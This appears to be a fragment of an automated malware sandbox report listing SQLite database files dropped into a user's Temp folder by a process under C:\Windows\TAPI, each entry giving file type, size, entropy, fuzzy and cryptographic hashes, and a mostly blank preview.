                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\inevpvkO9t

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ir4S0627TC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\iyFBnjmy7L

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\j2RYrbaZFq

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\j8JbPEyQqV

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jAXF0hT5Xo

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jC5pPH4fYq

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jJNMUntKjB

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jKvrF85lwo

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jRveRTvGGu

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jY5S99BsYy

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jbsTN6qDV8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\k4S8en7956

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\k6QeO6K8eQ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\k9WQ8LJ8Xb

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kMKdWg877d

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kxeV88YQ7h

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lLoYcPtYWF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lRSU51ZjBX

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ldxuVVozRz

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\lg7hpBkVYj

